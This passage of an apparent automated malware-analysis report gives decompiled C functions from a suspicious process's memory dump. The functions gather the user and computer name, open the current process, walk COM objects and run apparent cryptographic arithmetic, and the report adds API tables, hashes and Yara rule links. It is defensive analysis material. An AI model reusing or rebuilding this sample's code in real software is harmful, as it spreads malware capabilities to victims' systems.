										E04475D7D( *_t49, _t91, _t99,  *0x447d330, _a16);
										E0447A734(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d0447c0
									E04475D7D( *_t40, _t91, _a8,  *0x447d338, _a24);
									_t43 = _t101 + 0x10; // 0x3d0447c0
									E04475D7D( *_t43, _t91, _a8,  *0x447d330, _a16);
								}
								if( *_t101 != 0) {
									E0447A734(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d0447c0
					_t81 = E04478BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d0447c0
							E044722F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E0447A734(_t100);
						_t98 = _a16;
					}
					E0447A734(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E0447A749(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x447d33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                          0x0447853f
                                                          0x04478548
                                                          0x0447854f
                                                          0x04478554
                                                          0x044785c1
                                                          0x044785c7
                                                          0x044785cc
                                                          0x044785d3
                                                          0x044785d8
                                                          0x044785dd
                                                          0x04478748
                                                          0x0447874f
                                                          0x0447874f
                                                          0x04478754
                                                          0x04478756
                                                          0x04478756
                                                          0x0447875f
                                                          0x0447875f
                                                          0x044785e3
                                                          0x044785ef
                                                          0x0447873e
                                                          0x04478741
                                                          0x00000000
                                                          0x04478741
                                                          0x044785f5
                                                          0x044785fa
                                                          0x044785fd
                                                          0x04478602
                                                          0x04478607
                                                          0x04478650
                                                          0x04478650
                                                          0x04478663
                                                          0x0447866d
                                                          0x04478673
                                                          0x0447867a
                                                          0x04478684
                                                          0x04478684
                                                          0x0447867c
                                                          0x0447867c
                                                          0x0447867c
                                                          0x0447867c
                                                          0x044786a6
                                                          0x044786ae
                                                          0x044786dc
                                                          0x044786e1
                                                          0x044786e8
                                                          0x044786ed
                                                          0x044786f1
                                                          0x04478723
                                                          0x044786f3
                                                          0x04478700
                                                          0x04478703
                                                          0x04478713
                                                          0x04478716
                                                          0x0447871c
                                                          0x0447871c
                                                          0x044786b0
                                                          0x044786bd
                                                          0x044786c0
                                                          0x044786d2
                                                          0x044786d5
                                                          0x044786d5
                                                          0x0447872d
                                                          0x04478739
                                                          0x0447872f
                                                          0x04478732
                                                          0x04478732
                                                          0x0447872d
                                                          0x044786a6
                                                          0x00000000
                                                          0x0447866d
                                                          0x04478616
                                                          0x04478619
                                                          0x04478620
                                                          0x04478626
                                                          0x04478629
                                                          0x0447862b
                                                          0x04478637
                                                          0x0447863a
                                                          0x0447863a
                                                          0x04478640
                                                          0x04478645
                                                          0x04478645
                                                          0x0447864b
                                                          0x00000000
                                                          0x0447864b
                                                          0x04478559
                                                          0x00000000
                                                          0x04478580
                                                          0x04478580
                                                          0x0447858c
                                                          0x0447859f
                                                          0x044785a5
                                                          0x044785ad
                                                          0x00000000
                                                          0x044785ad

                                                          APIs
                                                          • StrChrA.SHLWAPI(04473741,0000005F,00000000,00000000,00000104), ref: 04478572
                                                          • lstrcpy.KERNEL32(?,?), ref: 0447859F
                                                            • Part of subcall function 04479070: lstrlen.KERNEL32(?,00000000,05019A98,00000000,04478808,05019C76,?,?,?,?,?,63699BC3,00000005,0447D00C), ref: 04479077
                                                            • Part of subcall function 04479070: mbstowcs.NTDLL ref: 044790A0
                                                            • Part of subcall function 04479070: memset.NTDLL ref: 044790B2
                                                            • Part of subcall function 04475D7D: lstrlenW.KERNEL32(?,?,?,04478708,3D0447C0,80000002,04473741,0447A513,74666F53,4D4C4B48,0447A513,?,3D0447C0,80000002,04473741,?), ref: 04475DA2
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 044785C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: 2d492d14d51f3e41f568b38f7412978d81aaf17efe127e1f60129981e2bae6ce
                                                          • Instruction ID: 53cf4ffba29b299ac1d3a8116d26c7e2aff9751e7754f3f1e14a519c0b625ace
                                                          • Opcode Fuzzy Hash: 2d492d14d51f3e41f568b38f7412978d81aaf17efe127e1f60129981e2bae6ce
                                                          • Instruction Fuzzy Hash: F0516A72510209BFEF21AF61DD88DDA77B9FF04354F00851AF91556120D739E927DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0447A199, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0447A199() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E0447A71F(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E0447A734(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4471fd4
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                          0x0447a1a7
                                                          0x0447a1aa
                                                          0x0447a1ad
                                                          0x0447a1b3
                                                          0x0447a1b8
                                                          0x0447a1be
                                                          0x0447a1c6
                                                          0x0447a1c9
                                                          0x0447a1cf
                                                          0x0447a1d4
                                                          0x0447a1e1
                                                          0x0447a1ee
                                                          0x0447a1f2
                                                          0x0447a1f4
                                                          0x0447a1f8
                                                          0x0447a1fb
                                                          0x0447a20b
                                                          0x0447a25e
                                                          0x0447a25f
                                                          0x0447a20d
                                                          0x0447a212
                                                          0x0447a213
                                                          0x0447a218
                                                          0x0447a21b
                                                          0x0447a22e
                                                          0x00000000
                                                          0x0447a230
                                                          0x0447a233
                                                          0x0447a238
                                                          0x0447a246
                                                          0x0447a249
                                                          0x0447a24f
                                                          0x0447a254
                                                          0x00000000
                                                          0x0447a256
                                                          0x0447a256
                                                          0x0447a259
                                                          0x0447a259
                                                          0x0447a254
                                                          0x0447a22e
                                                          0x0447a264
                                                          0x0447a265
                                                          0x0447a1d4
                                                          0x0447a26b

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,04471FD2), ref: 0447A1AD
                                                          • GetComputerNameW.KERNEL32(00000000,04471FD2), ref: 0447A1C9
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • GetUserNameW.ADVAPI32(00000000,04471FD2), ref: 0447A203
                                                          • GetComputerNameW.KERNEL32(04471FD2,?), ref: 0447A226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04471FD2,00000000,04471FD4,00000000,00000000,?,?,04471FD2), ref: 0447A249
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: e1b854b8ee16e9a94272e5654cc0acb51a92c33cafb2c30abdf126602b4d9569
                                                          • Instruction ID: f5c37847098cb32857a8e51a6f6a35d5177c8721b0e502588fa0476da3c72ffb
                                                          • Opcode Fuzzy Hash: e1b854b8ee16e9a94272e5654cc0acb51a92c33cafb2c30abdf126602b4d9569
                                                          • Instruction Fuzzy Hash: E721EA76A01208FFDB11DFE5D9849EEBBB8FF44304B1444AAE601E7240E635AB46DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04473DE9, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E04473DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04475AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E0447A81C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x447d128() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                          0x04473de9
                                                          0x04473df6
                                                          0x04473df8
                                                          0x04473e5b
                                                          0x00000000
                                                          0x04473e5b
                                                          0x04473e10
                                                          0x04473e17
                                                          0x04473e23
                                                          0x04473e28
                                                          0x04473e2a
                                                          0x04473e2c
                                                          0x04473e2e
                                                          0x04473e30
                                                          0x04473e32
                                                          0x04473e3e
                                                          0x04473e4e
                                                          0x00000000
                                                          0x04473e40
                                                          0x04473e40
                                                          0x04473e47
                                                          0x04473e54
                                                          0x04473e54
                                                          0x04473e54
                                                          0x04473e47
                                                          0x04473e3e
                                                          0x04473e59
                                                          0x00000000
                                                          0x00000000
                                                          0x04473e5f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,044767B8,?,?,00000000,00000000), ref: 04473E23
                                                          • ResetEvent.KERNEL32(?), ref: 04473E28
                                                          • GetLastError.KERNEL32 ref: 04473E40
                                                          • GetLastError.KERNEL32(?,?,00000102,044767B8,?,?,00000000,00000000), ref: 04473E5B
                                                            • Part of subcall function 04475AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04473E08,?,?,?,?,00000102,044767B8,?,?,00000000), ref: 04475AFD
                                                            • Part of subcall function 04475AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04473E08,?,?,?,?,00000102,044767B8,?), ref: 04475B5B
                                                            • Part of subcall function 04475AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 04475B6B
                                                          • SetEvent.KERNEL32(?), ref: 04473E4E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: 26669178f3a1db1d1e4f55914aacb349c5f82141470872af1c396dfbbdb26087
                                                          • Instruction ID: bd8a97c8f25bbeecaea7b37832c986f37c3bb1ec1485c934701bc4a505ac2ede
                                                          • Opcode Fuzzy Hash: 26669178f3a1db1d1e4f55914aacb349c5f82141470872af1c396dfbbdb26087
                                                          • Instruction Fuzzy Hash: 67014F31104241ABFF306F61DC84F9BB7A8EF44764F114A26F991A11E0D721F806EAA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04473E69, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04473E69(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x447d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x447d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x447d258 = _t6;
					 *0x447d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x447d254 = _t7;
					if(_t7 == 0) {
						 *0x447d254 =  *0x447d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                          0x04473e71
                                                          0x04473e77
                                                          0x04473e7e
                                                          0x00000000
                                                          0x04473ed8
                                                          0x04473e80
                                                          0x04473e88
                                                          0x04473e95
                                                          0x04473e95
                                                          0x04473ed5
                                                          0x00000000
                                                          0x04473ed5
                                                          0x04473e97
                                                          0x04473e97
                                                          0x04473e9c
                                                          0x04473eae
                                                          0x04473eb3
                                                          0x04473eb9
                                                          0x04473ebf
                                                          0x04473ec6
                                                          0x04473ec8
                                                          0x04473ec8
                                                          0x00000000
                                                          0x04473ecf
                                                          0x04473e91
                                                          0x00000000
                                                          0x00000000
                                                          0x04473e93
                                                          0x00000000

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0447131F,?,?,00000001,?,?,?,04474EF2,?), ref: 04473E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,04474EF2,?), ref: 04473E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04474EF2,?), ref: 04473E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04474EF2,?), ref: 04473EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,04474EF2,?), ref: 04473ED8
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: c100e70bc2f87d8d599bebd76eea3e073d1a135212af1c6b4af768b03d096356
                                                          • Instruction ID: c592dbc9b7fc4f5af46f331a9ab440ad54886c53cfd22d5f811c03b59255e168
                                                          • Opcode Fuzzy Hash: c100e70bc2f87d8d599bebd76eea3e073d1a135212af1c6b4af768b03d096356
                                                          • Instruction Fuzzy Hash: BCF0C8B0B603419BFB208F74AC19B5A7B51EB80701F100416EA03D62C0E778E803DB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04476F3A, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 46%
                                                          			E04476F3A(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x447d2a8; // 0xb9a5a8
					_t5 = _t103 + 0x447e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x447c290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x447d2a8; // 0xb9a5a8
												_t28 = _t109 + 0x447e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x447d2a8; // 0xb9a5a8
														_t33 = _t79 + 0x447e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                          0x04476f3f
                                                          0x04476f48
                                                          0x04476f49
                                                          0x04476f4d
                                                          0x04476f53
                                                          0x04476f59
                                                          0x04476f62
                                                          0x04476f68
                                                          0x04476f72
                                                          0x04476f74
                                                          0x04476f7a
                                                          0x04476f7f
                                                          0x04476f8a
                                                          0x04476f90
                                                          0x04476f95
                                                          0x044770b7
                                                          0x04476f9b
                                                          0x04476f9b
                                                          0x04476fa8
                                                          0x04476fae
                                                          0x04476fb4
                                                          0x04476fb8
                                                          0x04476fbe
                                                          0x04476fcb
                                                          0x04476fcf
                                                          0x04476fd5
                                                          0x04476fd8
                                                          0x04476fe0
                                                          0x04476fe1
                                                          0x04476fe5
                                                          0x04476fe9
                                                          0x04476fec
                                                          0x04476fef
                                                          0x04476ff5
                                                          0x04476ffe
                                                          0x04477004
                                                          0x04477005
                                                          0x04477008
                                                          0x04477009
                                                          0x0447700a
                                                          0x04477012
                                                          0x04477013
                                                          0x04477014
                                                          0x04477016
                                                          0x0447701a
                                                          0x0447701e
                                                          0x00000000
                                                          0x00000000
                                                          0x04477024
                                                          0x0447702d
                                                          0x04477033
                                                          0x0447703d
                                                          0x04477041
                                                          0x04477043
                                                          0x04477050
                                                          0x04477054
                                                          0x0447705c
                                                          0x04477061
                                                          0x04477073
                                                          0x04477075
                                                          0x0447707b
                                                          0x0447707b
                                                          0x04477084
                                                          0x04477084
                                                          0x04477086
                                                          0x0447708c
                                                          0x0447708c
                                                          0x0447708f
                                                          0x04477095
                                                          0x04477098
                                                          0x044770a1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x044770a1
                                                          0x04476ff5
                                                          0x04476fef
                                                          0x04476fd8
                                                          0x044770a7
                                                          0x044770a7
                                                          0x044770ad
                                                          0x044770ad
                                                          0x044770b3
                                                          0x044770b3
                                                          0x044770bc
                                                          0x044770c2
                                                          0x044770c2
                                                          0x04476f7f
                                                          0x044770cb

                                                          APIs
                                                          • SysAllocString.OLEAUT32(0447C290), ref: 04476F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 0447706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04477084
                                                          • SysFreeString.OLEAUT32(?), ref: 044770B3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: b60039ecdb5fab12909630567280234b848ffeabf4179e2254f930a54287d266
                                                          • Instruction ID: e6011c050a421bdafc57434c2decef070c4d367845bab04188771521fc065dcc
                                                          • Opcode Fuzzy Hash: b60039ecdb5fab12909630567280234b848ffeabf4179e2254f930a54287d266
                                                          • Instruction Fuzzy Hash: BA512C75D00519EFCF10DFE8C8889EEB7BAEF88704B158599E915EB211D731AD42CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 044753C6, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E044753C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04471AD1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E044750FF(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04475745(_t101,  &_v236, _a8, _t96 - _t81);
					E04475745(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E044750FF(_t101, 0x447d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E044750FF(_a16, _a4);
						E04475088(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0447AF2E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L0447AF28();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04475F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E044790C2(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04476044(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x447d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                          0x044753c9
                                                          0x044753d5
                                                          0x044753db
                                                          0x044753e0
                                                          0x044753e4
                                                          0x04475541
                                                          0x04475545
                                                          0x04475545
                                                          0x044753ea
                                                          0x044753ee
                                                          0x044753f2
                                                          0x044753f5
                                                          0x04475400
                                                          0x04475406
                                                          0x0447540b
                                                          0x0447540e
                                                          0x04475428
                                                          0x04475434
                                                          0x0447543d
                                                          0x04475447
                                                          0x0447544c
                                                          0x0447544e
                                                          0x04475451
                                                          0x044754ff
                                                          0x04475505
                                                          0x04475516
                                                          0x04475529
                                                          0x04475539
                                                          0x00000000
                                                          0x0447553e
                                                          0x0447545a
                                                          0x04475461
                                                          0x04475465
                                                          0x0447546b
                                                          0x0447546d
                                                          0x0447546f
                                                          0x04475471
                                                          0x04475473
                                                          0x0447547d
                                                          0x04475482
                                                          0x04475484
                                                          0x04475486
                                                          0x04475487
                                                          0x04475488
                                                          0x04475489
                                                          0x04475490
                                                          0x04475497
                                                          0x0447549a
                                                          0x0447549a
                                                          0x04475467
                                                          0x04475467
                                                          0x04475467
                                                          0x044754a2
                                                          0x044754aa
                                                          0x044754b3
                                                          0x044754b8
                                                          0x044754b8
                                                          0x044754bd
                                                          0x00000000
                                                          0x00000000
                                                          0x044754bf
                                                          0x044754c2
                                                          0x044754cc
                                                          0x00000000
                                                          0x00000000
                                                          0x044754ce
                                                          0x044754ce
                                                          0x044754d8
                                                          0x044754b8
                                                          0x044754bd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x044754bd
                                                          0x044754e2
                                                          0x044754e5
                                                          0x044754e8
                                                          0x044754ef
                                                          0x044754ef
                                                          0x044754fc
                                                          0x00000000
                                                          0x044754fc
                                                          0x044753f7
                                                          0x044753fb
                                                          0x044753fc
                                                          0x044753fe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x044753fe
                                                          0x00000000

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04475473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04475489
                                                          • memset.NTDLL ref: 04475529
                                                          • memset.NTDLL ref: 04475539
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
